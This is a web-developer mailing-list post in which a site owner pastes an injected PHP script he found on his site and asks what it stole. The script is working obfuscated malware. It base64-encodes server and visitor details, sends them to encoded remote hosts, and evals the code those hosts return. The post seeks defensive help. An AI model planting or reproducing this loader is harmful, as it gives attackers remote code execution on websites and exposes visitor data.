[wdvltalk] bad guys got me

[steve miller]

Hello...
I just found a bad script on my website :(

Can anyone here tell me what they might have stolen?

Here is the script:


error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER 
["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ?  
$_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER 
["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset 
($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset 
($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] :  
$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER 
["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER 
["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] :  
$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER 
["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER 
["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] :  
$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ?  
$_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE); 
$str=base64_encode($a).".".base64_encode($b).".".base64_encode 
($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode 
($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode 
($i).".".base64_encode($j); if ((include(base64_decode 
("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){}  
else if (include(base64_decode("aHR0cDovLw==").base64_decode 
("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));else if ($c=file_get_contents 
(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);else 
{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/"). 
$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec 
($cu);curl_close($cu);eval($str);};


steve

____ • The WDVL Discussion List from WDVL.COM • ____
To Join wdvltalk, Send An Email To: mailto:[EMAIL PROTECTED] or
use the web interface http://e-newsletters.internet.com/discussionlists.html/
      Send Your Posts To: wdvltalk@lists.wdvl.com
To change subscription settings, add a password or view the web interface:
http://intm-dl.sparklist.com/read/?forum=wdvltalk

________________  http://www.wdvl.com  _______________________

You are currently subscribed to wdvltalk as: [EMAIL PROTECTED]
To unsubscribe send a blank email to [EMAIL PROTECTED]
To unsubscribe via postal mail, please contact us at:
Jupitermedia Corp.
Attn: Discussion List Management
475 Park Avenue South
New York, NY 10016

Please include the email address which you have been contacted with.